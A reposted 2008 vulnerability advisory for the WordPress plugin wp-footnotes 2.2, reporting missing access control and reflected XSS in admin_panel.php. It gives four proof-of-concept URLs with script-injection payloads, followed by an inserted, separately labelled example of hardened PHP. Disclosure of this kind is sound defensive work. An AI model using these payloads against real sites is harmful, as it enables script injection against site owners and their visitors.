[EN] securityvulns.ru

From: nbbn_(at)_gmx.net <nbbn_(at)_gmx.net>
Date: 03.02.2008
Subject: Wordpress Plugin wp-footnotes 2.2 (admin_panel.php) Multiple Vulnerabilities

################################################################
Wordpress Plugin wp-footnotes 2.2 admin_panel.php Multiple Vulnerabilities
Found: 1st February 2008  Founder: NBBN
################################################################

1) No Access Control.

An attacker can access the footnotes admin panel.

http://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php

The result -> many XSS vulnerabilities, because the variables are not defined. And
he can add his own code to the blog footer.


2) Multiple XSS Vulnerabilities (Register Globals: ON)

http://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_footnotes_current_settings[priority]="><script>alert("XSS")</script>

http://site.tld/wordpress/wp-content/plugins/wp-footnotes/admin_panel.php?wp_footnotes_current_settings[style_rules]=</textarea><script>alert("XSS")</script>

http://site.tld/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current_settings[pre_footnotes]=</textarea><script>alert("XSS")</script>

http://site.tld/wordpress/wp-content/plugins/admin_panel.php?wp_footnotes_current_settings[post_footnotes]=</textarea><script>alert(":-(")
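As an added illustration, not the wp-footnotes plugin's own code: a hypothetical hardened settings page in PHP that closes both findings above (a file reachable without any access control, and settings values taken from request-populated globals and reflected unescaped into an attribute and into textareas). The wpfn_example_* function names, the option name, the nonce action and the default values are assumptions.

```php
<?php
// Added example, not the plugin's own code: hypothetical hardened settings page
// for a WordPress plugin; option, nonce, defaults and wpfn_example_* names are assumed.

// 1) Requested directly over HTTP, ABSPATH is undefined: render nothing.
if (!defined('ABSPATH')) {
    exit;
}

// Settings come from the stored option, never from request-populated globals,
// so register_globals=On cannot inject $wp_footnotes_current_settings.
function wpfn_example_settings() {
    $defaults = array('priority' => 11, 'style_rules' => '',
                      'pre_footnotes' => '', 'post_footnotes' => '');
    return wp_parse_args(get_option('wpfn_example_settings', array()), $defaults);
}

// 2) The form: capability check first, then escaping matched to each HTML context.
function wpfn_example_render_form() {
    if (!current_user_can('manage_options')) {
        wp_die('You do not have permission to change these settings.');
    }
    $s = wpfn_example_settings();
    echo '<form method="post">';
    wp_nonce_field('wpfn_example_save', 'wpfn_example_nonce');
    // Attribute context: esc_attr() encodes the quote used to break out of value="".
    echo '<input type="text" name="priority" value="' . esc_attr($s['priority']) . '">';
    // Textarea context: esc_textarea() encodes < so a stored </textarea> cannot close the element.
    foreach (array('style_rules', 'pre_footnotes', 'post_footnotes') as $key) {
        echo '<textarea name="' . esc_attr($key) . '">' . esc_textarea($s[$key]) . '</textarea>';
    }
    echo '<input type="submit" value="Save"></form>';
}

// Saving: capability + CSRF nonce, then sanitise (these values end up in the blog footer).
function wpfn_example_save() {
    if (!current_user_can('manage_options')) {
        wp_die('Forbidden');
    }
    check_admin_referer('wpfn_example_save', 'wpfn_example_nonce'); // dies on a bad nonce
    $in = wp_unslash($_POST);
    $clean = array(
        'priority'       => isset($in['priority']) ? absint($in['priority']) : 11,
        'style_rules'    => isset($in['style_rules']) ? wp_strip_all_tags($in['style_rules']) : '',
        'pre_footnotes'  => isset($in['pre_footnotes']) ? wp_kses_post($in['pre_footnotes']) : '',
        'post_footnotes' => isset($in['post_footnotes']) ? wp_kses_post($in['post_footnotes']) : '',
    );
    update_option('wpfn_example_settings', $clean);
}
```

The two render/save functions are meant to be wired to an admin menu page and a form handler respectively; the point is that the same defect pattern (no capability check, trusting globals, echoing without context-specific escaping) is what the four PoC URLs above exercise.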

© SecurityVulns, 3APA3A, Vladimir Dubrovin